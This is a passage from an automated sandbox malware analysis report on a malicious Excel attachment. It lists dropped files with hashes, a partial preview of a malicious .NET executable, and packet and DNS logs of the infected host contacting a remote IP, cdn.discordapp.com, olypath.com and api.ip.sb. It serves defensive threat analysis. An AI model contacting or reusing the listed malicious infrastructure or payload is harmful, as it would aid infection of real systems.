SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
C:\Users\user\AppData\Local\Temp\tmp738B.tmp
C:\Users\user\AppData\Local\Temp\tmp7486.tmp
C:\Users\user\AppData\Local\Temp\tmp7551.tmp
Copyright Joe Security LLC 2022 Page 26 of 65
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
C:\Users\user\AppData\Local\Temp\tmp764C.tmp
C:\Users\user\AppData\Local\Temp\tmp7718.tmp
C:\Users\user\AppData\Local\Temp\tmp7841.tmp
Copyright Joe Security LLC 2022 Page 27 of 65
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp790D.tmp
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp
Copyright Joe Security LLC 2022 Page 28 of 65
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: dropped
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false
Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: dropped
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false
Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP
C:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMP
Copyright Joe Security LLC 2022 Page 29 of 65
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: CDFV2 Encrypted
Category: dropped
Size (bytes): 190456
Entropy (8bit): 7.95591459608079
Encrypted: false
SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB
MD5: E9FFC84ABF7ED6F6A7BE0C9E347B4245
SHA1: D636A41A99A022B242A810C972F4E6ADCC779ABA
SHA-256: 03D548395841B2296DEE9A96F1ACA44337F238311A0B01D6CF61C0D998BCC59A
SHA-512: 66CD17A968D1DA8DDB4CD912EBA36F7148B44483BB9D5C49A8D855F226920BF01DB1D57E08CF051F571B27952732C5EBBD97CDC17A5672F5E2C17F088079B1BC
Malicious: false
Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
MD5: 797869BB881CFBCDAC2064F92B26E46F
SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious: true
C:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMP
C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP
C:\Users\user\Desktop\~$POAT2076452.xlsx
Copyright Joe Security LLC 2022 Page 30 of 65
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 14336
Entropy (8bit): 5.171700803602097
Encrypted: false
SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ
MD5: 980EC4304344F277D722024ADE08CD01
SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5
SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105
SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68
Malicious: true
Antivirus: Antivirus: ReversingLabs, Detection: 7%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................M... ...`....@.. ....................................@..................................M..S....`..............................PL............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@[email protected]..............@..B.................M......H........1..x.......9....................................................0..........(..........o...........s....(...+(...+.(.....8...........o....(...+....%..9......r...p([email protected](....-a..r...p(....-j..r#..p(....-s..r/..p(....:....8N......(.......2....i/...(.....8....r9..p(....8............(....(....8............(....(....8............(..........i0Ys........rU..po....&..rY..p.....(....(...+o....&..r_..po....&..o..........o....(....8....rc..p(....+v........(..........i0Vs
File type: CDFV2 Encrypted
Entropy (8bit): 7.95591459608079
TrID: Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: POAT2076452.xlsx
File size: 190456
MD5: e9ffc84abf7ed6f6a7be0c9e347b4245
SHA1: d636a41a99a022b242a810c972f4e6adcc779aba
SHA256: 03d548395841b2296dee9a96f1aca44337f238311a0b01d6cf61c0d998bcc59a
SHA512: 66cd17a968d1da8ddb4cd912eba36f7148b44483bb9d5c49a8d855f226920bf01db1d57e08cf051f571b27952732c5ebbd97cdc17a5672f5e2c17f088079b1bc
SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB
File Content Preview:
........................>......................................................................................................................................................................................................................................
Icon Hash: e4e2aa8aa4b4bcb4
Total Packets: 41
• 53 (DNS)
• 443 (HTTPS)
C:\Users\Public\vbc.exe
Static File Info
General
File Icon
Network Behavior
Network Port Distribution
Copyright Joe Security LLC 2022 Page 31 of 65
• 80 (HTTP)
Timestamp Source Port Dest Port Source IP Dest IP
Feb 22, 2022 15:30:27.291577101 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.612147093 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.613080025 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.613562107 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.935863018 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.935892105 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.935918093 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.935941935 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.936095953 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:28.257625103 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257653952 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257667065 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257680893 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257699013 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257715940 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257735014 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257903099 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:28.257942915 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:29.473887920 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:31.191129923 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.191171885 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.191234112 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.335231066 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.335268974 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.380274057 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.386909962 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.405797958 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.405827999 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.406517982 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.613889933 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.614546061 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.029573917 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.069870949 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075445890 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075669050 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075745106 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.075767040 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075790882 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075895071 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075954914 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.075964928 CET 443 49166 162.159.130.233 192.168.2.22
TCP Packets
Copyright Joe Security LLC 2022 Page 32 of 65
Feb 22, 2022 15:30:32.075985909 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076024055 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076186895 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076256037 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076271057 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076289892 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076348066 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076383114 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076461077 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076531887 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076551914 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076627016 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076699972 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076720953 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076893091 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076961994 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076966047 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076987982 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077045918 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077070951 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077256918 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077327013 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077327967 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077346087 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077398062 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077429056 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077555895 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077625036 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077625036 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077644110 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077699900 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077717066 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077833891 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077896118 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077913046 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078008890 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078071117 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078082085 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078099966 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078150034 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078166962 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078284979 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078357935 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078371048 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078388929 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078440905 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078455925 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078524113 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078577995 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078589916 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078605890 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078656912 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078694105 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078831911 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078896999 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078911066 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.079989910 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.080538034 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.091418982 CET 443 49166 162.159.130.233 192.168.2.22
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2022 Page 33 of 65
Timestamp Source Port Dest Port Source IP Dest IP
Feb 22, 2022 15:30:31.089102983 CET 52167 53 192.168.2.22 8.8.8.8
Feb 22, 2022 15:30:31.109594107 CET 53 52167 8.8.8.8 192.168.2.22
Feb 22, 2022 15:30:32.150242090 CET 50591 53 192.168.2.22 8.8.8.8
Feb 22, 2022 15:30:32.183111906 CET 53 50591 8.8.8.8 192.168.2.22
Feb 22, 2022 15:30:47.212419987 CET 57805 53 192.168.2.22 8.8.8.8
Feb 22, 2022 15:30:47.265172005 CET 59030 53 192.168.2.22 8.8.8.8
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Feb 22, 2022 15:30:31.089102983 CET 192.168.2.22 8.8.8.8 0x1af8 Standard query (0)
cdn.discordapp.com
A (IP address) IN (0x0001)
Feb 22, 2022 15:30:32.150242090 CET 192.168.2.22 8.8.8.8 0x3b9 Standard query (0)
olypath.com A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.212419987 CET 192.168.2.22 8.8.8.8 0x6392 Standard query (0)
api.ip.sb A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.265172005 CET 192.168.2.22 8.8.8.8 0xaa45 Standard query (0)
api.ip.sb A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Feb 22, 2022 15:30:31.109594107 CET
8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com
162.159.130.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET
